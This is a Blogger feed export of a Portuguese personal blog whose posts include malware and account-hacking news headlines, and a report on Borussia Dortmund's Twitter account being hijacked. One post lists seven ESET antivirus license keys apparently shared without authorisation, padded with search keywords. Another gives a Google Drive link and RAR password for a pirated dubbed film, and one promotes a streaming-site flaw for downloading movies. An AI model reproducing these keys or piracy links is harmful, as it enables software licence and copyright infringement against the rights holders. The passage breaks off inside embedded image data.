tag:blogger.com,1999:blog-44723443797169899452024-03-19T01:15:54.424-03:00#mrdrawer - We know!mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comBlogger181125tag:blogger.com,1999:blog-4472344379716989945.post-43602027431603662962018-04-08T13:22:00.000-03:002018-04-08T13:22:01.191-03:00JUST Waching - :Dmrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-70299847316395084082017-04-10T20:33:00.000-03:002017-04-10T20:33:06.806-03:00ESET Smart security and ESET antivirus NOD32 and ESET Internet security V10 also The licenses keys are for version 9<br /><div class="_e4b">
<br /></div>
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><div class="_e4b">
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">Tthe license keys are valid until 16.04.2017 ( 10. 5. 2017 )</span></span></div>
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">license nod 32 , active code nod 32, license key nod 32 , license key
valid 2018, license nod 32 version 10 , license key nod 32 valid
2020,new license nod 32 , activation cod nod 32</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">8ERV-XBXH-RXET-GF5K-CV76</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">9MT4-XG6F-SJD2-JVWT-433W</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">83MH-XV74-MRCW-S48R-TVFM</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">ESR7-XHDD-RAPW-58N2-3DHM</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">DNED-X5GJ-TVR2-US3A-VXTN</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">JCRF-X835-JMXA-VF87-SE9T</span></span><br />
<span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">
</span></span><span style="font-family: "Helvetica Neue",Arial,Helvetica,sans-serif;"><span style="font-size: small;">RGW2-XNFT-EXXW-PETH-HSTG</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgofnoTZrhu9-sSjOGEoFjMwPPz4zQVAVtB9D8JdYn43EydlxzXHW5xaJFrCAki89CBuopD6v1VIxwlYmHJuLZHjwh-r4llCXkJj-lLz8EK5TLE64XbG2V2DF9UaLZw4-T4yVsuLHDFOrpK/s1600/%25C3%25ADndice.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgofnoTZrhu9-sSjOGEoFjMwPPz4zQVAVtB9D8JdYn43EydlxzXHW5xaJFrCAki89CBuopD6v1VIxwlYmHJuLZHjwh-r4llCXkJj-lLz8EK5TLE64XbG2V2DF9UaLZw4-T4yVsuLHDFOrpK/s1600/%25C3%25ADndice.jpg" /></a></div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-25987277725808054012017-03-25T19:08:00.000-03:002017-03-25T19:08:09.832-03:00Streaming - thevid.net - Falha de Streaming - Facilita o download de Filmes<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO1_0pSvMj4uqSRsCXeOskw1b6gTE0I9__dg13MK8Om1l9bgy4u6QxrInL-gTtgzgXqIIXakbHOR66yNeyEZlDQ9KYAvwVKofAS2CJ40rEnu_0bsefDBzzYD9jUAkLuEqkPr9zPeXPxUjq/s1600/thevid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO1_0pSvMj4uqSRsCXeOskw1b6gTE0I9__dg13MK8Om1l9bgy4u6QxrInL-gTtgzgXqIIXakbHOR66yNeyEZlDQ9KYAvwVKofAS2CJ40rEnu_0bsefDBzzYD9jUAkLuEqkPr9zPeXPxUjq/s640/thevid.png" width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">:D</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">tx thevid.net </span>mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-31436347707123076112017-03-17T09:38:00.003-03:002017-03-17T10:07:23.509-03:00Malware<ul class="result_set" style="background-color: white; color: #333333; font-family: Roboto, sans-serif; font-size: 13px; list-style-type: none; margin: 0px; padding: 0px;">
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=http://g1.globo.com/tecnologia/noticia/grupo-de-hackers-da-coreia-do-norte-esta-por-tras-de-ataques-a-bancos-diz-symantec.ghtml&ct=ga&cd=CAAYADIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNG0zeBe9x5hFQwoh8H7NX_NZ75PVw" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">Grupo de hackers da Coreia do Norte está por trás de ataques a bancos, diz Symantec</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
Globo.com</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">O <b>malware</b> foi programado apenas para infectar internautas cujos endereços IP mostravam que eram de 104 organizações específicas em 31 países, ...</span></div>
</li>
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=https://www.jcorreiodopovo.com.br/noticia/confira-a-lista-dos-smartphones-android-infectados-e-que-trazem-malwares-ja-de-fabrica&ct=ga&cd=CAAYATIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNGABA2bzNoIwraMTSUnleHTqVNGeQ" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">Confira a lista dos smartphones Android infectados e que trazem <b>malwares</b> já de fabrica</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
Correio do Povo do Paraná</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">Uma das maiores preocupações de quem possui um dispositivo com Android é a exposição aos vírus e <b>Malwares</b> que podem acabar arruinando ...</span></div>
</li>
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=https://canaltech.com.br/noticia/hacker/whatsapp-e-telegram-podem-ser-hackeados-por-meio-de-uma-imagem-90680/&ct=ga&cd=CAAYAjIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNHb7qtq-X1jRZLz58oF6R6-22x9mQ" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">WhatsApp e Telegram podem ser hackeados por meio de uma imagem</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
Canaltech</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">Nesta quarta-feira (15), pesquisadores da Check Point anunciaram a descoberta de um novo <b>malware</b> que está circulando pelo WhatsApp e ...</span></div>
<div class="sub_result_block" style="margin-top: 8px;">
<div class="sub_result" style="font-size: 12px; line-height: 18px;">
<a class="sub_result_title" href="https://www.google.com/url?rct=j&sa=t&url=http://adrenaline.uol.com.br/2017/03/15/48782/malware-disfarcado-de-imagem-permite-que-hackers-invadam-contas-do-whatsapp-e-telegram/&ct=ga&cd=CAAYAjIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNH6-_y-Fq6WiFpIGXZVBAjeJQRQRA" style="color: #404040; text-decoration: none;" tabindex="0" target="_blank"><b>Malware</b> disfarçado de imagem permite que hackers invadam contas do Whatsapp e Telegram</a> <span class="sub_result_source" style="color: #aaaaaa;">- Adrenaline</span></div>
<div class="sub_result" style="font-size: 12px; line-height: 18px;">
<a class="sub_result_title" href="https://www.google.com/url?rct=j&sa=t&url=http://blogs.ne10.uol.com.br/mundobit/2017/03/15/malware-disfarcado-de-foto-pode-sequestrar-contas-do-whatsapp-e-telegram/&ct=ga&cd=CAAYAjIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNEFD3feTBRqqcp8SVks54tcHnEd7g" style="color: #404040; text-decoration: none;" tabindex="0" target="_blank"><b>Malware</b> disfarçado de foto pode sequestrar contas do WhatsApp e Telegram</a> <span class="sub_result_source" style="color: #aaaaaa;">- NE10</span></div>
<div>
<a class="full_coverage_link" href="http://news.google.com/news/story?ncl=https://canaltech.com.br/noticia/hacker/whatsapp-e-telegram-podem-ser-hackeados-por-meio-de-uma-imagem-90680/&hl=pt&geo=BR" style="color: #aaaaaa; font-size: 10px; text-decoration: none;" target="_blank">Cobertura completa</a></div>
</div>
</li>
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=http://www.tudocelular.com/android/noticias/n89773/android-malware-pre-instalado-smartphones.html&ct=ga&cd=CAAYAzIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNHISbqaDKxM5TCWC6ccFCAtZnefcw" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">Robozinho pré-infectado: smartphones Android estão trazendo <b>malwares</b> de fábrica; veja a lista</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
Tudocelular.com</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">Claro que existem diversos meios que podem auxiliar na fuga de tais intempéries para a plataforma, mas o que dizer quando um <b>malware</b> vem ...</span></div>
</li>
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=https://tugatech.com.pt/t24081-smartphones-android-vendidos-com-malware-por-revendedores-nao-autorizados&ct=ga&cd=CAAYBDIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNF2xr72L-DvJEMyI-b_JrrYyXcrng" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">Smartphones Android vendidos com <b>malware</b> por revendedores não autorizados</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
TugaTech (Blogue)</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">Recentemente foi descoberto que 38 equipamentos, pertencentes a duas empresas não identificadas nos EUA, foram infetados com <b>malware</b> antes ...</span></div>
</li>
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=http://idgnow.com.br/internet/2017/03/15/como-se-proteger-de-golpes-e-falsas-promocoes/&ct=ga&cd=CAAYBTIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNHNkGHMwSXp4sya_MGZqmdFZhc55g" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">Como se proteger de golpes e falsas promoções</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
IDG Now!</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">“De acordo com um relatório que divulgamos, 319.000 usuários encontraram o <b>malware</b> capaz de roubar dinheiro ou informações financeiras no ...</span></div>
</li>
<h3 class="source" style="color: #737373; font-size: 12px; font-weight: 400; margin: 0px; padding: 24px 0px 8px;">
WEB</h3>
<li class="result" style="border-top: 1px solid rgb(228, 228, 228); overflow-x: hidden; overflow-y: auto; padding: 12px 0px;"><h4 class="result_title" style="font-weight: 400; line-height: 19px; list-style: none outside none; margin: 0px; overflow: hidden; visibility: visible;">
<a class="result_title_link" href="https://www.google.com/url?rct=j&sa=t&url=https://www.workana.com/job/eliminar-malware-en-hosting&ct=ga&cd=CAAYADIdMGMyMWE2N2NiMWFjMDkzMzpjb20uYnI6cHQ6QlI&usg=AFQjCNFzO5EMCm1NLOXxL2n_82f2Hac6FQ" style="clear: left; color: #404040; cursor: pointer; display: inline; font-size: 14px; height: auto; line-height: 19px; list-style: none outside none; text-decoration: none; text-overflow: ellipsis; visibility: visible;" tabindex="0" target="_blank">Eliminar <b>Malware</b> en Hosting</a><div class="result_source" style="color: #aaaaaa; padding: 2px 0px; white-space: nowrap;">
Workana</div>
</h4>
<div>
<span class="snippet" style="color: #707070; display: block; font-size: 12px; height: auto; line-height: 20px; list-style: none outside none; visibility: visible;">Tenemos un wordpress hosting en Bluehost y nos lo desactivaron por <b>malware</b>. Necesitamos con urgencia eliminar los archivos que sean necesarios ...</span></div>
</li>
</ul>
<div>
<img alt="Resultado de imagem para malware" height="159" src="http://stealthsettings.com/wp-content/uploads/2015/12/Malicious-malware-warning-mess.jpg" width="200" /></div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-36212220693568207692017-03-16T17:57:00.001-03:002017-03-16T17:57:40.633-03:00Hackers invadem Twitter do Dortmund e taxam alemães de nazistas<span style="color: #333333; font-family: UOLText, arial, verdana, sans-serif;">A conta oficial do Borussia Dortmund no Twitter foi alvo de ataque de hackers nesta quarta-feira. Os invasores colocaram frases de cunho nazista e de apoio ao presidente turco Recep Tayyip Erdogan. </span><span style="color: #333333; font-family: UOLText, arial, verdana, sans-serif;">A conta do meia espanhol Javi Martinez que atua na Alemanha, mas no Bayern de Munique, também foi invadida.</span><div>
<span style="color: #333333; font-family: UOLText, arial, verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://twitter.com/DortmundLatino/status/841918504458694656/photo/1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWhC-fmtBLQRNOxGeJcW5CfpxiwmhgXsn4OH1nBMwe3olcs9K6HxtWQT_kpgwytCRyqipZzNEm9HB8mUBW-iqlz1bs4SL9j6UfyoFi7iEHMEiCjrlQKVyNEEbeb7O_vW-6bF6CaGTd53sh/s320/Capturar1.JPG" width="320" /></a></div>
<br /><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br />"Alemanha Nazi e Holanda nazi. Esta é um pequeno alerta otomano para vocês. Nos vemos em 16 de abril", escreveram.<br /></span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> A data se refere às eleições que serão realizadas na Turquia,que se encontra em atrito com o governo holandês, ao </span><span style="color: #333333;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">ao qual acusa de atuar como nazistas. Javi Martínez usou o próprio Twitter para explicar o que havia acontecido. "Perdão pelo último tweet. Obiviamente foi um ataque de hacker.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<span style="color: #333333; font-family: UOLText, arial, verdana, sans-serif;"><br /></span></div>
<div>
<span style="color: #333333; font-family: UOLText, arial, verdana, sans-serif;"><br /></span></div>
<div>
<span style="color: #333333; font-family: UOLText, arial, verdana, sans-serif; font-size: 10px;"><br /></span></div>
<div>
<br /></div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-34171413712997304512017-03-12T19:25:00.004-03:002017-03-12T19:31:07.454-03:00Animais Fantásticos e Onde Habitam - Torrent - Dublado- Português - 740P - Dual Audio<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Acesso o link do <i>GoogleDrIve:</i></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://docs.google.com/open?id=0B0t4OhAyGjRwdnp6NTd2WFAtZUk">https://docs.google.com/open?id=0B0t4OhAyGjRwdnp6NTd2WFAtZUk</a></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Senha do .RAR: <i>upload.belex</i></span></div>
<div>
<br /></div>
<div>
<img alt="Resultado de imagem para Animais Fantásticos e Onde Habitam" src="data:image/jpeg;base64,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